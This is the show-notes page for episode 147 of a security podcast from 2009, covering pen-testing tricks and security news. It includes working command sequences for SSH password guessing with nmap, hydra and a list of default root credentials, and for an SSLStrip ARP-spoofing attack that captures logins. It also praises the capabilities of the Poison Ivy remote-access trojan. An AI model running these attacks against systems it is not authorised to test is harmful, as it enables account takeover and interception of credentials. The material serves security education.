Episode147

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 147 - April 2, 2009

  • Training event in Southern N. E.! SANS@Home/Community - SEC517 Cutting-Edge Hacking Techniques - May 11 & 13th 7-10PM use the discount code "PaulDotCom" for a 10% savings - Click here to register now!
  • April 30th - PaulDotCom Security Weekly Special Edition - Episode 150 - We start recording/streaming at 12PM EDT and don't stop until midnight! Call lines will be open! Everyone should tune in for the big event!

Episode Media

mp3

Special Guests: www.i-hacked.com

With us tonight we have two of the people behind the popular hacking site:

Bill (hevnsnt) Trent (surbo)

i-hacked.com about page excerpt:

"Electronics are everywhere, and technology drives pretty much everything we do in today's world. We show you how to take advantage of these electronics to make them faster, give them added features, or to do things they were never intended to do."

Don't forget to check out their blog at edge.i-hacked.com

Tech Segment: Hydra: Without The Account Lockout

Hydra is a great tool. However, you can very easily overrun a host, or have Hydra running for very long periods of time. Here's a few little tricks to quickly check for users who enter easily guessible passwords:

Step 1 - Find all SSH hosts using Nmap. In this example, we will be targeting Linux systems running SSH:

nmap -sS -p22 -oG sshhosts -T4 192.168.1.0/24

Step 2 - Extract from the Nmap results the hosts that were listening on port 22/TCP and save them to a file:

grep open sshhosts  | cut -d" " -f2 > targets.in

Step 3 - Create a file with the usernames and passwords:

cat > userpass.dat 
root:password
root:letmein
root:changeme
root:calvin
root:default
root:abc123
admin:admin
root:toor
<ctrl-d>

Step 4 - Run Hydra using the information above:

hydra -t 1 -v -V -C userpass.dat -M targets.in -o success.out -e ns ssh2

The above command will use the usernames and passwords in "userpass.dat" and try to login with each of them to every host in "targets.in". It will try the username as the password and blank password for each username ("-e ns"). The "-t 1" will only execute one thread at a time, which is slower, but less crashes, noise, and account lockout.

References

Video Tech Segment: SSLStrip

SSLStrip is an excellent little utility that allows a tester to hijack SSL sessions and "strip" off the SSL to the victim. It also allows for the tester to log all communication (including userIDs and Password).

Please, check out the video:

Basic SSLStrip usage from the video:


Step 1 - Set up IP forwarding.

echo "1" > /proc/sys/net/ipv4/ip_forward

Step 2 - Set up your iptables rule for redirecting port 80 traffic to 8080 (where sslstrip is listening.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Step 3 - Fire up arpspoof.

arpspoof -i eth0 -t 172.16.30.132 172.16.30.2

Step 4 - Fire up sslstrip.

python ./sslstrip.py -a -l 8080

Step 5 - Watch your logs.

tail -f ./sslstrip.log

References

Stories For Discussion

1) Conficker - [PaulDotCom] - Thats all I'm sayin' :)

2) Federalization of Cyber Security? - [strandjs] - New legislation for the federal regulation of cyber security. But wait!!! it will also apply to private organizations as well. I think that many in the government are starting to wake up and realize that things are not as rosy as they thought. But is this a good thing? While I think it may help insofar as keeping info sec pros employed I also believe there will be some nasty side effects. Remember the 9 most terrifying words you can hear "I'm from the government and I'm here to help."

3) - CredCollect for Metasploit - [Larry] - It seems that there is a lot of development into plugins for Metasploit lately (maybe that's why they got shut down?  :-)), and this one is no exception. How about some automation using Priv and Incognito to harvest credentials, stored in formats suitable for cracking later? My favorite line: "The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times." [PaulDotCom] - On credential collecting - I'd like to see this expanded to include applications that store things in the registry (like VNC), or other insecurities. For example, ever do a strings on your OS X keychain? It stores your iTunes share passwords in clear text. Nice huh? This could then be stored in the database and compared to other passwords, or compar usernames. Ultimately it would be nice to keep track of which passwords have been tried on which systems and with which usernames.

4) PayPal resource exhaustion Combine this with significant other fuzzing, and you get lots of cool toys.

5) Nmap Conficker detection - [Larry] - Yes Con-fick-er (there is no photo sharing in this worm) has been beat to death. Let's just say that it was either an epic failure, april fools day joke, or a calculated strategy. So, what if it was a calculated strategy; waiting to launch an attack or receive instructions after April 1st after all of the hype has gone away, and everyone has largely forgotten about it? Yes, those infections are still there on workstations on your networks. Just because April 1st is over, doesn't mean you shouldn't scan your network to find infected hosts and remediate them.

6) Just a few words on GhostNet - [Larry] - Ahh, the smell of monitoring governments with a botnet in the morning! Here's come great coverage on the tool used, Poison Ivy. Even more analysis and papers here.

7) Checkpoint FW-1 PKI overflow - [Larry] - Interesting disclosure. Tested on a client site (where it apparently caused a crash, and no further testing was possible. Looks like very long http headers caused the crash...

8) Smart grids? How about your HVAC? - [Larry] - Last week we talked about smartgrids, but think smaller. What about all of those other control systems in your buildings, especially those in a campus environment. Environmental controls? Lighting? How many of these are IP enabled? How about dialup? How about interface exposed to the user?

9) Security Buzzword Generator - [PaulDotCom] - I love security buzzwords. We used to play a game when I worked for the unvisity and vendors came to present and try to sell us the latest security product. We'd agree on buzzwords before hand, you know, "0day protection", "identify risk", etc... Each time they used it we're keep track to pass the time :)

10) winAUTOPWN - [PaulDotCom] - Although I have no proof what-so-ever, I think this is a haox. It came out right around April fool's day, and the descriptions just sound really odd. It comes in a rar file, which you then have to use 7zip to get the binary. Its a Windows binary with no source code. Would you run this on your system? I hope not, I did not have time to properly analyze it, but it smells fishy to me, in fact, it stinks. I could be wrong here, but just use caution.

11) Don't Install MacCinema - [PaulDotCom] - W00t, malware for OS X! Love it. The preinstall and postinstall scripts are obfuscated bash scripts that do evil stuff. Lots of command line kung fu in here! It actually makes entries in your crontab to run the malware. This is pretty easy to detect. Ultimately it downloads another script, which then changes your DNS servers. Pretty lame if you ask me, I would think that creating a kernel extention in OSX would be a MUCH better way to hide and change settings on the fly.

12) Poison Ivy - [PaulDotCOm] - This is a great tool! We used it in the hacking competition to infect computers. There are some limitations, like the C&C server has to be a real OS not virtual. But, its kind of like backorifice on steriods. Give you the remote video from the desktop, interacts with the webcam, jumps into different processes, has an uploader/downloader. Check out the screenshots on the web site, it does get picked up by A/V, and I'm told that packing it can break functionality. Also, audio capture is a cool piece of functionality, someone needs to add this to meterpreter :)

13) OpenSSL 1.0.0 Beta! - [PaulDotCom] - Took them ten years, but finally reaching 1.0. I just thought that was funny :)